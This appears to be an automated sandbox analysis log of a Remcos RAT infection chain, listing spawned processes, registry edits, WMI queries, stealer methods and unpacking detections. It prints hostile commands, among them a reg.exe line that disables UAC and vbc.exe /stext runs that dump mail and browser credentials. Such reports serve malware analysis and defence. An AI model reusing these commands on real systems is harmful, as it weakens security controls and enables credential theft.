                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\moyvwyrrsmhoowrqsha"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wilgxqclgvztqcfubsndyj"
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\dwn.exe "C:\Users\user\AppData\Roaming\Remcos\dwn.exe"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Remcos\remcos.exe C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe "C:\Users\user\AppData\Local\Temp\21.exe" 0
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\5.exe "C:\Users\user\AppData\Local\Temp\5.exe" 0
                    Source: C:\Users\user\AppData\Roaming\Remcos\dwn.exeProcess created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\21.exeProcess created: C:\Users\user\AppData\Local\Temp\21.exe "C:\Users\user\AppData\Local\Temp\21.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess created: C:\Users\user\AppData\Local\Temp\5.exe "C:\Users\user\AppData\Local\Temp\5.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\4.exeProcess created: C:\Users\user\AppData\Local\Temp\4.exe "C:\Users\user\AppData\Local\Temp\4.exe" 0
                    Source: C:\Users\user\AppData\Local\Temp\5.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2132
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_00414367 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_00414367
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\4.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeSystem information queried: HandleInformation
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeFile created: C:\Users\user\AppData\Local\Temp\nstE23F.tmpJump to behavior
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,1_2_00402012
                    Source: C:\Users\user\Desktop\xxTzyGLZx5.exeCode function: 1_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_0040411B
                    Source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp, remcos.exe, 0000001F.00000002.756430645.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\5.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Local\Temp\5.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Local\Temp\4.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCode function: 4_2_0040D25B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,4_2_0040D25B
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.csBase64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.csBase64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4812:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_01
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1328:120:WilError_01
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-36FQQT
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_01
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Software\4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Exe4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Exe4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Inj4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Inj4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Inj4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Remcos-36FQQT4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: ProductName4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: pf4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: origmsc4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: 0f4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: x(f4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: exepath4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: exepath4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: licence4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: hpg4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: Administrator4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\rem9090sta.exeCommand line argument: User4_2_0040C2E2
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile written: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\21.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\4.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\5.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeDirectory created: C:\Program Files\Microsoft DN1\sqlmap.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\bin.exeDirectory created: C:\Program Files\Microsoft DN1\rdpwrap.iniJump to behavior
                    Source: Binary string: wntdll.pdbUGP source: xxTzyGLZx5.exe, 00000001.00000003.670539145.00000000149D0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000001.00000003.674258624.0000000014840000.00000004.00000001.sdmp
                    Source: Binary string: wntdll.pdb source: xxTzyGLZx5.exe, 00000001.00000003.670539145.00000000149D0000.00000004.00000001.sdmp, xxTzyGLZx5.exe, 00000001.00000003.674258624.0000000014840000.00000004.00000001.sdmp
                    Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp
                    Source: Binary string: wuser32.pdb source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmp
                    Source: Binary string: wuser32.pdbUGP source: bin.exe, 00000003.00000002.939597757.0000000003B7F000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.940953351.0000000003F90000.00000040.00000001.sdmp
                    Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: bin.exe, 00000003.00000003.840888944.00000000046E1000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840241692.0000000000D93000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.840177868.0000000000D85000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943517281.0000000004128000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.846003061.00000000047E0000.00000040.00000001.sdmp, bin.exe, 00000003.00000003.839090036.0000000000D76000.00000004.00000001.sdmp, bin.exe, 00000003.00000003.839114022.0000000000D84000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.945019121.0000000004876000.00000004.00000001.sdmp, bin.exe, 00000003.00000002.943929284.00000000041B9000.00000004.00000010.sdmp, bin.exe, 00000003.00000003.840539619.00000000046EF000.00000004.00000001.sdmp

                    Data Obfuscation:

                    barindex
                    Detected unpacking (changes PE section rights)Show sources
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeUnpacked PE file: 31.2.remcos.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeUnpacked PE file: 32.2.remcos.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    Source: C:\Users\user\AppData\Roaming\Remcos\remcos.exeUnpacked PE file: 33.2.remcos.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.gfids:R;.rsrc:R;.reloc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    Detected unpacking (creates a PE file in dynamic memory)Show sources
                    Source: C:\Users\user\AppData\Local\Temp\5.exeUnpacked PE file: 40.2.5.exe.4970000.15.unpack
                    Source: C:\Users\user\AppData\Local\Temp\4.exeUnpacked PE file: 41.2.4.exe.2520000.4.unpack
                    .NET source code contains potential unpackerShow sources
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 40.2.5.exe.4970000.15.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
